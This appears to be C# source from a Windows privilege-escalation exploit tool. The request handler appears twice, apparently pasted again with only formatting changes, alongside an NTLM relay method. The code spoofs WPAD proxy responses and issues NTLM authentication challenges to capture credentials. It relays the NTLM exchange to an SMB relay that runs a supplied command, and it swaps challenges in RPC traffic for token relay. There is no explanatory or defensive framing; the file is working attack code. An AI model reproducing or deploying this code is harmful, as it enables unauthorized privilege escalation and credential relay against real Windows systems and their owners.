public void recvRequest(object sender, HttpRequestEventArgs e)
{
using (var writer = new StreamWriter(e.Response.OutputStream))
{
HttpRequest request = e.Request;
// Obtain a response object.
HttpResponse response = e.Response;
// Construct a response.
System.Collections.Specialized.NameValueCollection headers = request.Headers;
Console.WriteLine("Got Request: "+request.HttpMethod+" "+request.Url.AbsoluteUri.ToString()+"!");
if (request.HttpMethod.ToLower().Equals("head") || request.HttpMethod.ToLower().Equals("get") || request.HttpMethod.ToLower().Equals("post") || request.HttpMethod.ToLower().Equals("options") || request.HttpMethod.ToLower().Equals("put"))
{
if (request.Url.AbsoluteUri.ToString().Contains("GETHASHES"))
{
Console.WriteLine("Sending 401...");
if (headers["Authorization"] == null && workingUri == null)
{
Console.WriteLine("Got request for hashes...");
response.Headers.Add("WWW-Authenticate","NTLM");
response.StatusCode = 401;
state = 0;
}
else
{
String authHeader = headers["Authorization"];
byte[] ntlmBlock = getNtlmBlock(authHeader);
if (ntlmBlock != null && (workingUri == null || workingUri == request.Url.AbsoluteUri.ToString()))
{
workingUri = request.Url.AbsoluteUri.ToString();
if (state == 0)
{
Console.WriteLine("Parsing initial NTLM auth...\n"+authHeader);
smbRelayThread = new Thread(()=>smbRelay.startSMBRelay(ntlmQueue,this.cmd));
ntlmQueue.Clear();
smbRelayThread.Start();
ntlmQueue.Enqueue(ntlmBlock);
byte[] challenge = null;
Config.signalHandlerClient.WaitOne();
challenge = ntlmQueue.Dequeue();
Console.WriteLine("Got SMB challenge " + Convert.ToBase64String(challenge));
if(challenge != null){
response.Headers.Add("WWW-Authenticate","NTLM " + Convert.ToBase64String(challenge));
state = state + 1;
response.StatusCode = 401;
}
}
else if (state == 1 && request.Url.AbsoluteUri.ToString().Equals(workingUri))
{
Console.WriteLine("Parsing final auth...");
if (ntlmBlock[8] == 3)
{
Console.WriteLine(Convert.ToBase64String(ntlmBlock));
}
ntlmQueue.Enqueue(ntlmBlock);
Config.signalHandler.Set();
response.StatusCode = 200;
state = state + 1;
Config.signalHandlerClient.WaitOne();
byte[] checkStatus = ntlmQueue.Dequeue();
if (checkStatus[0] == 99)
{
writer.Close();
smbRelayThread.Abort();
finished.Set();
return;
}
else
{
workingUri = null;
smbRelayThread.Abort();
ntlmQueue = new Queue<byte[]>();
smbRelay = new SMBRelay();
writer.Close();
state = 0;
}
}
}
}
writer.Close();
return;
}
else if (request.Url.AbsoluteUri.ToString().Equals("http://127.0.0.1/wpad.dat") || request.Url.AbsoluteUri.ToString().Equals("http://wpad/wpad.dat"))
{
Console.WriteLine("Spoofing wpad...");
response.StatusCode = 200;
String responseTxt = "function FindProxyForURL(url,host){if (dnsDomainIs(host, \"localhost\")) return \"DIRECT\";";
for (int i = 0; i < wpad_exclude.Length;i++ )
{
responseTxt = responseTxt + "if (dnsDomainIs(host, \"" + wpad_exclude[i] + "\")) return \"DIRECT\";";
}
responseTxt = responseTxt + "return \"PROXY 127.0.0.1:80\";}";
writer.Write(responseTxt);
}
else if (workingUri == null && !request.Url.AbsoluteUri.ToString().Contains("wpad") && !request.Url.AbsoluteUri.ToString().Contains("favicon"))
{
Random rnd = new Random();
int sess = rnd.Next(1, 1000000);
response.Headers.Add("Location", "http://localhost:"+srvPort+"/GETHASHES"+sess);
Console.WriteLine("Redirecting to target.."+response.Headers["Location"]);
response.StatusCode = 302;
writer.Close();
}
}
else if (request.HttpMethod.ToLower().Equals("propfind"))
{
if (request.Url.AbsoluteUri.ToString().Equals("http://localhost/test"))
{
Console.WriteLine("Got PROPFIND for /test... Responding");
response.StatusCode = 207;
response.ContentType = "application/xml";
writer.Write("<?xml version='1.0' encoding='UTF-8'?><ns0:multistatus xmlns:ns0=\"DAV:\"><ns0:response><ns0:href>/test/</ns0:href><ns0:propstat><ns0:prop><ns0:resourcetype><ns0:collection /></ns0:resourcetype><ns0:creationdate>2015-08-03T14:53:38Z</ns0:creationdate><ns0:getlastmodified>Tue, 11 Aug 2015 15:48:25 GMT</ns0:getlastmodified><ns0:displayname>test</ns0:displayname><ns0:lockdiscovery /><ns0:supportedlock><ns0:lockentry><ns0:lockscope><ns0:exclusive /></ns0:lockscope><ns0:locktype><ns0:write /></ns0:locktype></ns0:lockentry><ns0:lockentry><ns0:lockscope><ns0:shared /></ns0:lockscope><ns0:locktype><ns0:write /></ns0:locktype></ns0:lockentry></ns0:supportedlock></ns0:prop><ns0:status>HTTP/1.1 200 OK</ns0:status></ns0:propstat></ns0:response></ns0:multistatus>");
writer.Close();
}
else
{
Console.WriteLine("Got PROPFIND for "+request.Url.AbsoluteUri.ToString()+" returning 404");
response.StatusCode = 404;
writer.Close();
}
}
else
{
Console.WriteLine("Got " + request.HttpMethod + " for " + request.Url.AbsoluteUri.ToString()+" replying 404");
response.StatusCode = 404;
writer.Close();
}
}
}
public void recvRequest(object sender, HttpRequestEventArgs e)
{
using (var writer = new StreamWriter(e.Response.OutputStream))
{
HttpRequest request = e.Request;
// Obtain a response object.
HttpResponse response = e.Response;
// Construct a response.
System.Collections.Specialized.NameValueCollection headers = request.Headers;
Console.WriteLine("Got Request: " + request.HttpMethod + " " + request.Url.AbsoluteUri.ToString() + "!");
if (request.HttpMethod.ToLower().Equals("head") || request.HttpMethod.ToLower().Equals("get") || request.HttpMethod.ToLower().Equals("post") || request.HttpMethod.ToLower().Equals("options") || request.HttpMethod.ToLower().Equals("put"))
{
if (request.Url.AbsoluteUri.ToString().Contains("GETHASHES"))
{
Console.WriteLine("Sending 401...");
if (headers["Authorization"] == null && workingUri == null)
{
Console.WriteLine("Got request for hashes...");
response.Headers.Add("WWW-Authenticate", "NTLM");
response.StatusCode = 401;
state = 0;
}
else
{
String authHeader = headers["Authorization"];
byte[] ntlmBlock = getNtlmBlock(authHeader);
if (ntlmBlock != null && (workingUri == null || workingUri == request.Url.AbsoluteUri.ToString()))
{
workingUri = request.Url.AbsoluteUri.ToString();
if (state == 0)
{
Console.WriteLine("Parsing initial NTLM auth...\n" + authHeader);
smbRelayThread = new Thread(() => smbRelay.startSMBRelay(ntlmQueue, this.cmd));
ntlmQueue.Clear();
smbRelayThread.Start();
ntlmQueue.Enqueue(ntlmBlock);
byte[] challenge = null;
Config.signalHandlerClient.WaitOne();
challenge = ntlmQueue.Dequeue();
Console.WriteLine("Got SMB challenge " + Convert.ToBase64String(challenge));
if (challenge != null)
{
response.Headers.Add("WWW-Authenticate", "NTLM " + Convert.ToBase64String(challenge));
state = state + 1;
response.StatusCode = 401;
}
}
else if (state == 1 && request.Url.AbsoluteUri.ToString().Equals(workingUri))
{
Console.WriteLine("Parsing final auth...");
if (ntlmBlock[8] == 3)
{
Console.WriteLine(Convert.ToBase64String(ntlmBlock));
}
ntlmQueue.Enqueue(ntlmBlock);
Config.signalHandler.Set();
response.StatusCode = 200;
state = state + 1;
Config.signalHandlerClient.WaitOne();
byte[] checkStatus = ntlmQueue.Dequeue();
if (checkStatus[0] == 99)
{
writer.Close();
smbRelayThread.Abort();
finished.Set();
return;
}
else
{
workingUri = null;
smbRelayThread.Abort();
ntlmQueue = new Queue <byte[]>();
smbRelay = new SMBRelay();
writer.Close();
state = 0;
}
}
}
}
writer.Close();
return;
}
else if (request.Url.AbsoluteUri.ToString().Equals("http://127.0.0.1/wpad.dat") || request.Url.AbsoluteUri.ToString().Equals("http://wpad/wpad.dat"))
{
Console.WriteLine("Spoofing wpad...");
response.StatusCode = 200;
String responseTxt = "function FindProxyForURL(url,host){if (dnsDomainIs(host, \"localhost\")) return \"DIRECT\";";
for (int i = 0; i < wpad_exclude.Length; i++)
{
responseTxt = responseTxt + "if (dnsDomainIs(host, \"" + wpad_exclude[i] + "\")) return \"DIRECT\";";
}
responseTxt = responseTxt + "return \"PROXY 127.0.0.1:80\";}";
writer.Write(responseTxt);
}
else if (workingUri == null && !request.Url.AbsoluteUri.ToString().Contains("wpad") && !request.Url.AbsoluteUri.ToString().Contains("favicon"))
{
Random rnd = new Random();
int sess = rnd.Next(1, 1000000);
response.Headers.Add("Location", "http://localhost:" + srvPort + "/GETHASHES" + sess);
Console.WriteLine("Redirecting to target.." + response.Headers["Location"]);
response.StatusCode = 302;
writer.Close();
}
}
else if (request.HttpMethod.ToLower().Equals("propfind"))
{
if (request.Url.AbsoluteUri.ToString().Equals("http://localhost/test"))
{
Console.WriteLine("Got PROPFIND for /test... Responding");
response.StatusCode = 207;
response.ContentType = "application/xml";
writer.Write("<?xml version='1.0' encoding='UTF-8'?><ns0:multistatus xmlns:ns0=\"DAV:\"><ns0:response><ns0:href>/test/</ns0:href><ns0:propstat><ns0:prop><ns0:resourcetype><ns0:collection /></ns0:resourcetype><ns0:creationdate>2015-08-03T14:53:38Z</ns0:creationdate><ns0:getlastmodified>Tue, 11 Aug 2015 15:48:25 GMT</ns0:getlastmodified><ns0:displayname>test</ns0:displayname><ns0:lockdiscovery /><ns0:supportedlock><ns0:lockentry><ns0:lockscope><ns0:exclusive /></ns0:lockscope><ns0:locktype><ns0:write /></ns0:locktype></ns0:lockentry><ns0:lockentry><ns0:lockscope><ns0:shared /></ns0:lockscope><ns0:locktype><ns0:write /></ns0:locktype></ns0:lockentry></ns0:supportedlock></ns0:prop><ns0:status>HTTP/1.1 200 OK</ns0:status></ns0:propstat></ns0:response></ns0:multistatus>");
writer.Close();
}
else
{
Console.WriteLine("Got PROPFIND for " + request.Url.AbsoluteUri.ToString() + " returning 404");
response.StatusCode = 404;
writer.Close();
}
}
else
{
Console.WriteLine("Got " + request.HttpMethod + " for " + request.Url.AbsoluteUri.ToString() + " replying 404");
response.StatusCode = 404;
writer.Close();
}
}
}
private byte[] doNTLMMagic(byte[] buf)
{
byte[] ret_bytes = buf;
if (smbRelayThread == null)
{
SMBRelay smbRelay = new SMBRelay();
smbRelayThread = new Thread(() => smbRelay.startSMBRelay(NTLMRelayingProxy.ntlmQueue, cmd));
}
if (tokenRelayThread == null)
{
SSPIHelper tokenRelay = new SSPIHelper();
tokenRelayThread = new Thread(() => tokenRelay.TokenRelay(new_ntlmQueueIn, new_ntlmQueueOut));
}
try
{
byte[] ntlm_bytes = NTLMExtract(buf);
if (ntlm_bytes != null)
{
if (ntlm_bytes[8] == 1)
{
if (enable_token != null)
{
Console.WriteLine("GOT TYPE1 MESSAGE TOKEN-RELAY!");
new_ntlmQueueIn.Add(ntlm_bytes);
tokenRelayThread.Start();
challenge = new_ntlmQueueOut.Take();
}
else if (!smbRelayThread.IsAlive)
{
Console.WriteLine("GOT TYPE1 MESSAGE");
ntlmQueue.Enqueue(ntlm_bytes);
smbRelayThread.Start();
Config.signalHandlerClient.WaitOne();
challenge = ntlmQueue.Dequeue();
}
}
else if (ntlm_bytes[8] == 2)
{
Console.WriteLine("GOT TYPE2 MESSAGE (CHALLENGE) from RPCs");
if (challengeCount > 0 || !dropFirst)
{
ret_bytes = replaceChallenge(buf, challenge);
}
challengeCount = challengeCount + 1;
}
else if (ntlm_bytes[8] == 3)
{
if (enable_token != null)
{
Console.WriteLine("GOT TYPE3 MESSAGE (AUTH) TOKEN-RELAY");
new_ntlmQueueIn.Add(ntlm_bytes);
byte[] checkStatus = new_ntlmQueueOut.Take();
if (checkStatus[0] == 99)
{
Thread.Sleep(500); // Incase its not finished!
tokenRelayThread.Abort();
DCERPCNtlmHandler.finished.Set();
// this.disconnected.Set();
}
else
{
new_ntlmQueueIn = new BlockingCollection <byte[]>();
new_ntlmQueueOut = new BlockingCollection <byte[]>();
challengeCount = 0;
tokenRelayThread = null;
}
}
else
{
Console.WriteLine("GOT TYPE3 MESSAGE (AUTH)");
ntlmQueue.Enqueue(ntlm_bytes);
Config.signalHandler.Set();
Config.signalHandlerClient.WaitOne();
byte[] checkStatus = ntlmQueue.Dequeue();
Config.signalHandler.Set();
if (checkStatus[0] == 99)
{
Thread.Sleep(500);
smbRelayThread.Abort();
tokenRelayThread.Abort();
DCERPCNtlmHandler.finished.Set();
// this.disconnected.Set();
}
}
}
}
}
catch (Exception e)
{
Console.WriteLine(e);
return(ret_bytes);
}
return(ret_bytes);
}
